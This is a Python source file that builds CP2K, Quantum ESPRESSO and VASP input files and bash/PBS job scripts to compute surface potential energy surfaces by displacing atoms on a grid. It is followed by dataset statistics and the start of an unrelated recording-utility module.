fout.write("do\n")
fout.write(" if [ ${deltax} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltax=0.000\n")
fout.write(" fi\n")
fout.write(" if [ ${deltay} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltay=0.000\n")
fout.write(" fi\n")
fout.write(" # run the calculation\n")
fout.write(" cd _${deltax}_${deltay}_\n")
fout.write(" %s %s -in %s | tee %s\n" % (self.run_params["mpi"], "$PMF_CP2K", "geo-opt.inp", "geo-opt.out"))
fout.write(" cd ../\n")
fout.write("done\n")
fout.write("done\n")
# write bash script to generate the xyz trajectory file -> (relaxed)
#with open("get_traj_relaxed.sh", 'w') as fout:
fout.write("\n\n")
fout.write("# code to extract final structure for each combination of deltax and deltay\n")
#fout.write("#!/bin/bash\n")
#fout.write("\n")
#fout.write("\n")
fout.write("output_trajfile=./post-processing/trajectory-relaxed.xyz\n")
fout.write("natom=%d\n" % self.force_eval.subsys.xyz.natom)
fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
fout.write("do\n")
fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
fout.write("do\n")
fout.write(" if [ ${deltax} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltax=0.000\n")
fout.write(" fi\n")
fout.write(" if [ ${deltay} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltay=0.000\n")
fout.write(" fi\n")
fout.write(" echo ${natom} >> ${output_trajfile}\n")
fout.write(" cat >> ${output_trajfile}<<EOF\n")
fout.write("deltax: ${deltax} | deltay: ${deltay}\n")
fout.write("EOF\n")
fout.write(" cat _${deltax}_${deltay}_/ab-initio-pos-1.xyz | tail -n -${natom} >> ${output_trajfile}\n")
fout.write("done\n")
fout.write("done\n")
# write result analysis file
#with open("get_pes.sh", 'w') as fout:
fout.write("\n\n")
#fout.write("#!/bin/bash\n")
fout.write("cat > post-processing/pes.data<<EOF\n")
fout.write("# format: x y energy(Ry)\n")
fout.write("EOF\n")
fout.write("\n")
fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
fout.write("do\n")
fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
fout.write("do\n")
fout.write(" if [ ${deltax} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltax=0.000\n")
fout.write(" fi\n")
fout.write(" if [ ${deltay} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltay=0.000\n")
fout.write(" fi\n")
fout.write(" energy=`cat _${deltax}_${deltay}_/geo-opt.out | grep 'ENERGY| Total FORCE_EVAL ( QS ) energy (a.u.):' | tail -1`\n")
fout.write(" cat >> post-processing/pes.data<<EOF\n")
fout.write("${deltax} ${deltay} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("done\n")
fout.write("\n")
fout.write("cat > post-processing/plot.gnuplot<<EOF\n")
fout.write("set term png\n")
fout.write("set output 'pes.png'\n")
fout.write("splot 'pes.data'\n")
fout.write("set xlabel 'x'\n")
fout.write("set ylabel 'y'\n")
fout.write("EOF\n")
fout.write("cd post-processing; gnuplot plot.gnuplot; cd ../\n")
os.chdir("../")
if runopt == "genrun" or runopt == "run":
os.chdir(directory)
os.system("bash pes-relax.sh")
oschdir("../")
# server handle
server_handle(auto=auto, directory=directory, jobfilebase="pes-relax", server=self.run_params["server"])
class qe_run(qe.opt_run):
"""
Note:
calculate the surface potential energy surface via Quantum ESPRESSO.
"""
def __init__(self):
"""
"""
super().__init__()
self.pes_params = {}
self.set_pes() # set default value
def set_pes(self, move_atom=[-1], xrange=[0, 1.5, 0.1], yrange=[0, 1.5, 0.5], zshift=0.0, fix_z=1, fix_y=2, fix_x=2):
"""
:parma move_atom: the atoms that will move in the calculation, list start from 0.
:param xrange: x range for moving the specified moving atoms.
:param: yrange: y range for moving the specified moving atoms
:param: zshift: z shift for the moving atoms, will shift the z of specified moving atoms by value of zshift
:param: fix_z: 0 -> do not fix any z of the atoms, 1 -> only fix z of the buttom atoms, 2: fix z of both the buttom and the moving atoms.
:param: fix_y: 0 -> do not fix any y of the atoms, 1 -> only fix y of the buttom atoms, 2: fix y of both the buttom and the moving atoms.
:param: fix_x: 0 -> do not fix any x of the atoms, 1 -> only fix x of the buttom atoms, 2: fix x of both the buttom and the moving atoms.
"""
self.pes_params["move_atom"] = move_atom
self.pes_params["xrange"] = xrange
self.pes_params["yrange"] = yrange
self.pes_params["zshift"] = zshift
self.pes_params["fix_z"] = fix_z
self.pes_params["fix_y"] = fix_y
self.pes_params["fix_x"] = fix_x
def run(self, directory="tmp-qe-pes-opt", runopt="gen", auto=0):
if runopt == "gen" or runopt == "genrun":
if os.path.exists(directory):
shutil.rmtree(directory)
os.mkdir(directory)
shutil.copyfile(self.arts.xyz.file, os.path.join(directory, os.path.basename(self.arts.xyz.file)))
all_upfs = [s for s in os.listdir() if s.split(".")[-1] == "UPF"]
for element in self.arts.xyz.specie_labels:
for upf in all_upfs:
if upf.split(".")[0] == element:
shutil.copyfile(upf, os.path.join(directory, upf))
break
self.arts.pseudo.dir = os.path.abspath(directory)
self.control.set_params({"pseudo_dir": os.path.abspath(directory)})
#
xrange = self.pes_params["xrange"]
yrange = self.pes_params["yrange"]
zshift = self.pes_params["zshift"]
fix_z = self.pes_params["fix_z"]
fix_y = self.pes_params["fix_y"]
fix_x = self.pes_params["fix_x"]
os.chdir(directory)
# generate the input files and the initial trajectory
os.system("mkdir -p post-processing")
# first iterate y and iterate x which is good for post processing to get the imgage
for deltay in np.arange(yrange[0], yrange[1], yrange[2]):
for deltax in np.arange(xrange[0], xrange[1], xrange[2]):
# to avoid float -0.000 be translated to string -0.000 we use 0.0 when value ==0 whether it is 0.0 or -0.0
os.mkdir("_%.3f_%.3f_" % (deltax if np.abs(deltax) >= 0.001 else 0.0, deltay if np.abs(deltay) >= 0.001 else 0.0))
for i in self.pes_params["move_atom"]:
self.arts.xyz.atoms[i].x += deltax
self.arts.xyz.atoms[i].y += deltay
# shift z of the specified atoms by self.pes_params["zshfit"]
#----------------------------------------------
self.arts.xyz.atoms[i].z += zshift
# first fix xyz of all atoms
for i in range(len(self.arts.xyz.atoms)):
self.arts.xyz.atoms[i].fix = [True, True, True]
# unfix z of moving atoms or z of no moving atoms
if fix_z == 0:
for i in range(len(self.arts.xyz.atoms)):
self.arts.xyz.atoms[i].fix[2] = False
elif fix_z == 1:
for i in self.pes_params["move_atom"]:
self.arts.xyz.atoms[i].fix[2] = False
elif fix_z == 2:
# nothing need to do
pass
# unfix x or y of moving atoms or no moving atoms
if fix_y == 0:
for i in range(len(self.arts.xyz.atoms)):
self.arts.xyz.atoms[i].fix[1] = False
elif fix_y == 1:
for i in self.pes_params["move_atom"]:
self.arts.xyz.atoms[i].fix[1] = False
elif fix_y == 2:
# nothing need to do
pass
if fix_x == 0:
for i in range(len(self.arts.xyz.atoms)):
self.arts.xyz.atoms[i].fix[0] = False
elif fix_x == 1:
for i in self.pes_params["move_atom"]:
self.arts.xyz.atoms[i].fix[0]
elif fix_x == 2:
# noting to do
pass
with open("_%.3f_%.3f_/relax.in" % (deltax if np.abs(deltax) >= 0.001 else 0.0, deltay if np.abs(deltay) >= 0.001 else 0.0), 'w') as fout:
self.control.to_in(fout)
self.system.to_in(fout)
self.electrons.to_in(fout)
self.ions.to_in(fout)
self.arts.to_in(fout)
with open("post-processing/trajectory-initial.xyz", 'a') as fout:
# generate the xyz trajectory file -> (unrelaxed original traj)
fout.write("%d\n" % self.arts.xyz.natom)
fout.write("deltax: %.3f | deltay: %.3f\n" % (deltax if np.abs(deltax) >= 0.001 else 0.0, deltay if np.abs(deltay) >= 0.001 else 0.0))
for atom in self.arts.xyz.atoms:
fout.write("%s %.9f %.9f %.9f\n" % (atom.name, atom.x, atom.y, atom.z))
for i in self.pes_params["move_atom"]:
# now we move the x y z back to the original value
self.arts.xyz.atoms[i].x -= deltax
self.arts.xyz.atoms[i].y -= deltay
self.arts.xyz.atoms[i].z -= zshift
# write pbs job control script
with open("pes-relax.pbs", 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#PBS -N %s\n" % self.run_params["jobname"])
fout.write("#PBS -l nodes=%d:ppn=%d\n" % (self.run_params["nodes"], self.run_params["ppn"]))
if "queue" in self.run_params and self.run_params["queue"] != None:
fout.write("#PBS -q %s\n" %self.run_params["queue"])
fout.write("\n")
fout.write("cd $PBS_O_WORKDIR\n")
fout.write("NP=`cat $PBS_NODEFILE | wc -l`\n")
# do not add -w to seq
fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
fout.write("do\n")
fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
fout.write("do\n")
fout.write(" if [ ${deltax} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltax=0.000\n")
fout.write(" fi\n")
fout.write(" if [ ${deltay} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltay=0.000\n")
fout.write(" fi\n")
fout.write(" # run the calculation\n")
fout.write(" cd _${deltax}_${deltay}_\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % ("$PMF_PWX", "relax.in", "relax.out"))
fout.write(" cd ../\n")
fout.write("done\n")
fout.write("done\n")
# write bash script to generate the xyz trajectory file -> (relaxed)
#with open("get_traj_relaxed.sh", 'w') as fout:
fout.write("\n\n")
fout.write("# code to extract final structure for each combination of deltax and deltay\n")
#fout.write("#!/bin/bash\n")
#fout.write("\n")
#fout.write("\n")
fout.write("output_trajfile=./post-processing/trajectory-relaxed.xyz\n")
fout.write("natom=%d\n" % self.arts.xyz.natom)
fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
fout.write("do\n")
fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
fout.write("do\n")
fout.write(" if [ ${deltax} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltax=0.000\n")
fout.write(" fi\n")
fout.write(" if [ ${deltay} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltay=0.000\n")
fout.write(" fi\n")
fout.write(" post-qe-relax.py -d _${deltax}_${deltay}_\n")
fout.write(" echo ${natom} >> ${output_trajfile}\n")
fout.write(" cat >> ${output_trajfile}<<EOF\n")
fout.write("deltax: ${deltax} | deltay: ${deltay}\n")
fout.write("EOF\n")
fout.write(" cat _${deltax}_${deltay}_/post-processing/trajectory.xyz | tail -n -${natom} >> ${output_trajfile}\n")
fout.write("done\n")
fout.write("done\n")
# write result analysis file
#with open("get_pes.sh", 'w') as fout:
fout.write("\n\n")
#fout.write("#!/bin/bash\n")
fout.write("cat > post-processing/pes.data<<EOF\n")
fout.write("# format: x y energy(Ry)\n")
fout.write("EOF\n")
fout.write("\n")
fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
fout.write("do\n")
fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
fout.write("do\n")
fout.write(" if [ ${deltax} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltax=0.000\n")
fout.write(" fi\n")
fout.write(" if [ ${deltay} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltay=0.000\n")
fout.write(" fi\n")
fout.write(" energy=`cat _${deltax}_${deltay}_/relax.out | grep '! total energ' | tail -1`\n")
fout.write(" cat >> post-processing/pes.data<<EOF\n")
fout.write("${deltax} ${deltay} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("done\n")
fout.write("\n")
fout.write("cat > post-processing/plot.gnuplot<<EOF\n")
fout.write("set term png\n")
fout.write("set output 'pes.png'\n")
fout.write("splot 'pes.data'\n")
fout.write("set xlabel 'x'\n")
fout.write("set ylabel 'y'\n")
fout.write("EOF\n")
fout.write("cd post-processing; gnuplot plot.gnuplot; cd ../\n")
# write local bash run script
with open("pes-relax.sh", 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#\n")
fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
fout.write("do\n")
fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
fout.write("do\n")
fout.write(" if [ ${deltax} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltax=0.000\n")
fout.write(" fi\n")
fout.write(" if [ ${deltay} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltay=0.000\n")
fout.write(" fi\n")
fout.write(" # run the calculation\n")
fout.write(" cd _${deltax}_${deltay}_\n")
fout.write(" %s %s < %s > %s\n" % (self.run_params["mpi"], "$PMF_PWX", "relax.in", "relax.out"))
fout.write(" cd ../\n")
fout.write("done\n")
fout.write("done\n")
# write bash script to generate the xyz trajectory file -> (relaxed)
#with open("get_traj_relaxed.sh", 'w') as fout:
fout.write("\n\n")
fout.write("# code to extract final structure for each combination of deltax and deltay\n")
#fout.write("#!/bin/bash\n")
#fout.write("\n")
#fout.write("\n")
fout.write("output_trajfile=./post-processing/trajectory-relaxed.xyz\n")
fout.write("natom=%d\n" % self.arts.xyz.natom)
fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
fout.write("do\n")
fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
fout.write("do\n")
fout.write(" if [ ${deltax} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltax=0.000\n")
fout.write(" fi\n")
fout.write(" if [ ${deltay} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltay=0.000\n")
fout.write(" fi\n")
fout.write(" post-qe-relax.py -d _${deltax}_${deltay}_\n")
fout.write(" echo ${natom} >> ${output_trajfile}\n")
fout.write(" cat >> ${output_trajfile}<<EOF\n")
fout.write("deltax: ${deltax} | deltay: ${deltay}\n")
fout.write("EOF\n")
fout.write(" cat _${deltax}_${deltay}_/post-processing/trajectory.xyz | tail -n -${natom} >> ${output_trajfile}\n")
fout.write("done\n")
fout.write("done\n")
# write result analysis file
#with open("get_pes.sh", 'w') as fout:
fout.write("\n\n")
#fout.write("#!/bin/bash\n")
fout.write("cat > post-processing/pes.data<<EOF\n")
fout.write("# format: x y energy(Ry)\n")
fout.write("EOF\n")
fout.write("\n")
fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
fout.write("do\n")
fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
fout.write("do\n")
fout.write(" if [ ${deltax} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltax=0.000\n")
fout.write(" fi\n")
fout.write(" if [ ${deltay} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltay=0.000\n")
fout.write(" fi\n")
fout.write(" energy=`cat _${deltax}_${deltay}_/relax.out | grep '! total energ' | tail -1`\n")
fout.write(" cat >> post-processing/pes.data<<EOF\n")
fout.write("${deltax} ${deltay} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("done\n")
fout.write("\n")
fout.write("cat > post-processing/plot.gnuplot<<EOF\n")
fout.write("set term png\n")
fout.write("set output 'pes.png'\n")
fout.write("splot 'pes.data'\n")
fout.write("set xlabel 'x'\n")
fout.write("set ylabel 'y'\n")
fout.write("EOF\n")
fout.write("cd post-processing; gnuplot plot.gnuplot; cd ../\n")
os.chdir("../")
if runopt == "genrun" or runopt == "run":
os.chdir(directory)
os.system("bash pes-relax.sh")
oschdir("../")
# server handle
server_handle(auto=auto, directory=directory, jobfilebase="pes-relax", server=self.run_params["server"])
class vasp_run(vasp.opt_run):
"""
Note:
calculate the surface potential energy surface via VASP.
"""
def __init__(self):
"""
"""
super().__init__()
self.pes_params = {}
self.set_pes() # set default value
self.batch_x_y = None
def set_pes(self, move_atom=[-1], xrange=[0, 1.5, 0.1], yrange=[0, 1.5, 0.5], zshift=0.0, fix_z=1, fix_y=2, fix_x=2):
"""
:parma move_atom: the atoms that will move in the calculation, list start from 0.
:param xrange: x range for moving the specified moving atoms.
:param: yrange: y range for moving the specified moving atoms
:param: zshift: z shift for the moving atoms, will shift the z of specified moving atoms by value of zshift
:param: fix_z: 0 -> do not fix any z of the atoms, 1 -> only fix z of the buttom atoms, 2: fix z of both the buttom and the moving atoms.
:param: fix_y: 0 -> do not fix any y of the atoms, 1 -> only fix y of the buttom atoms, 2: fix y of both the buttom and the moving atoms.
:param: fix_x: 0 -> do not fix any x of the atoms, 1 -> only fix x of the buttom atoms, 2: fix x of both the buttom and the moving atoms.
"""
self.pes_params["move_atom"] = move_atom
self.pes_params["xrange"] = xrange
self.pes_params["yrange"] = yrange
self.pes_params["zshift"] = zshift
self.pes_params["fix_z"] = fix_z
self.pes_params["fix_y"] = fix_y
self.pes_params["fix_x"] = fix_x
def run(self, directory="tmp-vasp-pes-opt", runopt="gen", auto=0):
"""
"""
xrange = self.pes_params["xrange"]
yrange = self.pes_params["yrange"]
zshift = self.pes_params["zshift"]
fix_z = self.pes_params["fix_z"]
fix_y = self.pes_params["fix_y"]
fix_x = self.pes_params["fix_x"]
nx = len(np.arange(xrange[0], xrange[1], xrange[2]))
ny = len(np.arange(yrange[0], yrange[1], yrange[2]))
if self.batch_x_y == None:
# namely all in one batch
self.batch_x_y = [nx, ny]
else:
pass
if nx % self.batch_x_y[0] == 0:
n_batch_x = int(nx / self.batch_x_y[0])
else:
n_batch_x = int(nx / self.batch_x_y[0]) + 1
if ny % self.batch_x_y[1] == 0:
n_batch_y = int(ny / self.batch_x_y[1])
else:
n_batch_y = int(ny / self.batch_x_y[1]) + 1
#
if runopt == "gen" or runopt == "genrun":
if os.path.exists(directory):
shutil.rmtree(directory)
os.mkdir(directory)
shutil.copyfile("POTCAR", os.path.join(directory, "POTCAR"))
os.system("cp %s %s/" % (self.poscar.xyz.file, directory))
#
#xrange = self.pes_params["xrange"]
#yrange = self.pes_params["yrange"]
#zshift = self.pes_params["zshift"]
#fix_z = self.pes_params["fix_z"]
os.chdir(directory)
# generate the input files and the initial trajectory
os.system("mkdir -p post-processing")
# first iterate y and iterate x which is good for post processing to get the imgage
for deltay in np.arange(yrange[0], yrange[1], yrange[2]):
for deltax in np.arange(xrange[0], xrange[1], xrange[2]):
# to avoid float -0.000 be translated to string -0.000 we use 0.0 when value ==0 whether it is 0.0 or -0.0
os.mkdir("_%.3f_%.3f_" % (deltax if np.abs(deltax) >= 0.001 else 0.0, deltay if np.abs(deltay) >= 0.001 else 0.0))
for i in self.pes_params["move_atom"]:
self.poscar.xyz.atoms[i].x += deltax
self.poscar.xyz.atoms[i].y += deltay
# shift z of the specified atoms by self.pes_params["zshfit"]
#----------------------------------------------
self.poscar.xyz.atoms[i].z += zshift
# first fix xyz of all atoms
for i in range(len(self.poscar.xyz.atoms)):
self.poscar.xyz.atoms[i].fix = [True, True, True]
# unfix z of moving atoms or z of no moving atoms
if fix_z == 0:
for i in range(len(self.poscar.xyz.atoms)):
self.poscar.xyz.atoms[i].fix[2] = False
elif fix_z == 1:
for i in self.pes_params["move_atom"]:
self.poscar.xyz.atoms[i].fix[2] = False
elif fix_z == 2:
# nothing need to do
pass
# unfix x or y of moving atoms or no moving atoms
if fix_y == 0:
for i in range(len(self.poscar.xyz.atoms)):
self.poscar.xyz.atoms[i].fix[1] = False
elif fix_y == 1:
for i in self.pes_params["move_atom"]:
self.poscar.xyz.atoms[i].fix[1] = False
elif fix_y == 2:
# nothing need to do
pass
if fix_x == 0:
for i in range(len(self.poscar.xyz.atoms)):
self.poscar.xyz.atoms[i].fix[0] = False
elif fix_x == 1:
for i in self.pes_params["move_atom"]:
self.poscar.xyz.atoms[i].fix[0]
elif fix_x == 2:
# noting to do
pass
with open("_%.3f_%.3f_/POSCAR" % (deltax if np.abs(deltax) >= 0.001 else 0.0, deltay if np.abs(deltay) >= 0.001 else 0.0), 'w') as fout:
self.poscar.to_poscar(fout)
with open("post-processing/trajectory-initial.xyz", 'a') as fout:
# generate the xyz trajectory file -> (unrelaxed original traj)
fout.write("%d\n" % self.poscar.xyz.natom)
fout.write("deltax: %.3f | deltay: %.3f\n" % (deltax if np.abs(deltax) >= 0.001 else 0.0, deltay if np.abs(deltay) >= 0.001 else 0.0))
for atom in self.poscar.xyz.atoms:
fout.write("%s %.9f %.9f %.9f\n" % (atom.name, atom.x, atom.y, atom.z))
for i in self.pes_params["move_atom"]:
# now we move the x y z back to the original value
self.poscar.xyz.atoms[i].x -= deltax
self.poscar.xyz.atoms[i].y -= deltay
self.poscar.xyz.atoms[i].z -= zshift
with open("INCAR", 'w') as fout:
self.incar.to_incar(fout)
with open("KPOINTS", 'w') as fout:
self.kpoints.to_kpoints(fout)
# write local bash run script
with open("pes-relax.sh", 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#\n")
fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
fout.write("do\n")
fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
fout.write("do\n")
fout.write(" if [ ${deltax} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltax=0.000\n")
fout.write(" fi\n")
fout.write(" if [ ${deltay} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltay=0.000\n")
fout.write(" fi\n")
fout.write(" # run the calculation\n")
fout.write(" cd _${deltax}_${deltay}_\n")
fout.write(" cp ../INCAR .; cp ../POTCAR .; cp ../KPOINTS .;\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE %s\n" % ("$PMF_VASP_STD"))
fout.write(" cd ../\n")
fout.write("done\n")
fout.write("done\n")
fout.write("cd post-processing; bash get_pes.sh; bash get_trajectory.sh; cd ../\n")
# result collection bash script
with open("post-processing/get_pes.sh", 'w') as fout:
fout.write("#!/bin/bash\n")
# write pes analysis file
fout.write("\n\n")
#fout.write("#!/bin/bash\n")
fout.write("cat > ./pes.data<<EOF\n")
fout.write("# format: x y energy(Ry)\n")
fout.write("EOF\n")
fout.write("\n")
fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
fout.write("do\n")
fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
fout.write("do\n")
fout.write(" if [ ${deltax} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltax=0.000\n")
fout.write(" fi\n")
fout.write(" if [ ${deltay} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltay=0.000\n")
fout.write(" fi\n")
fout.write(" energy=`cat ../_${deltax}_${deltay}_/OUTCAR | grep 'entropy=' | tail -1 | cut -d \"=\" -f 2 | cut -d \"e\" -f 1`\n")
fout.write(" cat >> ./pes.data<<EOF\n")
fout.write("${deltax} ${deltay} ${energy}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("done\n")
fout.write("\n")
fout.write("cat > ./plot.gnuplot<<EOF\n")
fout.write("set term png\n")
fout.write("set output 'pes.png'\n")
fout.write("splot 'pes.data'\n")
fout.write("set xlabel 'x'\n")
fout.write("set ylabel 'y'\n")
fout.write("EOF\n")
fout.write("gnuplot plot.gnuplot\n")
with open("post-processing/get_trajectory.sh", 'w') as fout:
fout.write("#!/bin/bash\n")
# write bash script to generate the xyz trajectory file -> (relaxed)
#with open("get_traj_relaxed.sh", 'w') as fout:
fout.write("\n\n")
fout.write("# code to extract final structure for each combination of deltax and deltay\n")
#fout.write("#!/bin/bash\n")
#fout.write("\n")
#fout.write("\n")
fout.write("output_trajfile=./trajectory-relaxed.xyz\n")
fout.write("natom=%d\n" % self.poscar.xyz.natom)
fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
fout.write("do\n")
fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
fout.write("do\n")
fout.write(" if [ ${deltax} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltax=0.000\n")
fout.write(" fi\n")
fout.write(" if [ ${deltay} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltay=0.000\n")
fout.write(" fi\n")
fout.write(" sflow convert -i ../_${deltax}_${deltay}_/CONTCAR -o ../_${deltax}_${deltay}_/optimized.xyz\n")
fout.write(" echo ${natom} >> ${output_trajfile}\n")
fout.write(" cat >> ${output_trajfile}<<EOF\n")
fout.write("deltax: ${deltax} | deltay: ${deltay}\n")
fout.write("EOF\n")
fout.write(" cat ../_${deltax}_${deltay}_/optimized.xyz | tail -n -${natom} >> ${output_trajfile}\n")
fout.write("done\n")
fout.write("done\n")
# batch submitting script
# dividing structures into groups, each group has one sub script
# generate job script for each batch
for i_batch_y in range(n_batch_y):
for i_batch_x in range(n_batch_x):
# write pbs job control script
with open("pes-relax-batch-%d-%d.pbs" % (i_batch_x, i_batch_y), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#PBS -N %s-%d-%d\n" % (self.run_params["jobname"], i_batch_x, i_batch_y))
fout.write("#PBS -l nodes=%d:ppn=%d\n" % (self.run_params["nodes"], self.run_params["ppn"]))
if "queue" in self.run_params and self.run_params["queue"] != None:
fout.write("#PBS -q %s\n" %self.run_params["queue"])
fout.write("\n")
fout.write("cd $PBS_O_WORKDIR\n")
fout.write("NP=`cat $PBS_NODEFILE | wc -l`\n")
y_start = yrange[0] + i_batch_y * self.batch_x_y[1] * yrange[2]
y_end = yrange[0] + (i_batch_y+1) * self.batch_x_y[1] * yrange[2] - yrange[2] / 2
# - yrange[2] / 2, so that the last value is ignored which is actually the begining of next batch
if y_end > yrange[1]:
y_end = yrange[1]
x_start = xrange[0] + i_batch_x * self.batch_x_y[0] * xrange[2]
x_end = xrange[0] + (i_batch_x+1) * self.batch_x_y[0] * xrange[2] - xrange[2] / 2
# - xrange[2] / 2, so that the last value is ignored which is actually the begining of next batch
if x_end > xrange[1]:
x_end = xrange[1]
# do not add -w to seq
fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (y_start, yrange[2], y_end))
fout.write("do\n")
fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (x_start, xrange[2], x_end))
fout.write("do\n")
fout.write(" if [ ${deltax} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltax=0.000\n")
fout.write(" fi\n")
fout.write(" if [ ${deltay} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltay=0.000\n")
fout.write(" fi\n")
fout.write(" # run the calculation\n")
fout.write(" cd _${deltax}_${deltay}_\n")
fout.write(" cp ../INCAR .; cp ../POTCAR .; cp ../KPOINTS .;\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE %s\n" % ("$PMF_VASP_STD"))
fout.write(" cd ../\n")
fout.write("done\n")
fout.write("done\n")
os.chdir("../")
if runopt == "genrun" or runopt == "run":
os.chdir(directory)
os.system("bash pes-relax.sh")
oschdir("../")
# server handle
for i_batch_y in range(n_batch_y):
for i_batch_x in range(n_batch_x):
#print("i_batch_x: %d, ibatch_y: %d\n" % (i_batch_x, i_batch_y))
server_handle(auto=auto, directory=directory, jobfilebase="pes-relax-batch-%d-%d" % (i_batch_x, i_batch_y), server=self.run_params["server"])
| 53.826822
| 162
| 0.463432
| 6,416
| 50,974
| 3.603024
| 0.04894
| 0.174028
| 0.158325
| 0.024917
| 0.925985
| 0.917723
| 0.908163
| 0.899684
| 0.896224
| 0.889259
| 0
| 0.026373
| 0.385569
| 50,974
| 946
| 163
| 53.883721
| 0.711718
| 0.131655
| 0
| 0.833566
| 0
| 0.015385
| 0.238739
| 0.039378
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012587
| false
| 0.013986
| 0.011189
| 0
| 0.027972
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4c93987fa0e47603ec4d310b8e57e99ae307652
| 11,170
|
py
|
Python
|
recording/utils/recording_utils.py
|
chrelli/3DDD_social_mouse_tracker
|
291d2ed90029628dd65db0ce3e8972b721159a15
|
[
"Apache-2.0"
] | 1
|
2022-02-10T07:26:09.000Z
|
2022-02-10T07:26:09.000Z
|
recording/utils/recording_utils.py
|
chrelli/3DDD_social_mouse_tracker
|
291d2ed90029628dd65db0ce3e8972b721159a15
|
[
"Apache-2.0"
] | 1
|
2022-02-11T06:55:29.000Z
|
2022-02-12T22:26:44.000Z
|
recording/utils/recording_utils.py
|
chrelli/3DDD_social_mouse_tracker
|
291d2ed90029628dd65db0ce3e8972b721159a15
|
[
"Apache-2.0"
] | null | null | null |
#%% Import the nescessary stuff
# basic OS stuff
import time, os, sys, shutil
# for math and plotting
import pandas as pd
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
# small utilities
import csv
from colour import Color
from itertools import compress # for list selection with logical
from tqdm import tqdm
# for image manipulation
import cv2
# for recording and connecting to the intel realsense librar
#import pyrealsense as pyrs
#import multiprocessing
import multiprocessing
from multiprocessing import Process
import click
#%% helping functions to run stuff during recording!
def load_auto_roi(which_device):
# simply look for the most recent LED folder!
top_folder = '/media/chrelli/Data0'
# get a list of the folders in that directory
folder_list = next(os.walk(top_folder))[1]
logic_list = [x[0:8] == 'led_mask' for x in folder_list]
led_list = list(compress(folder_list,logic_list))
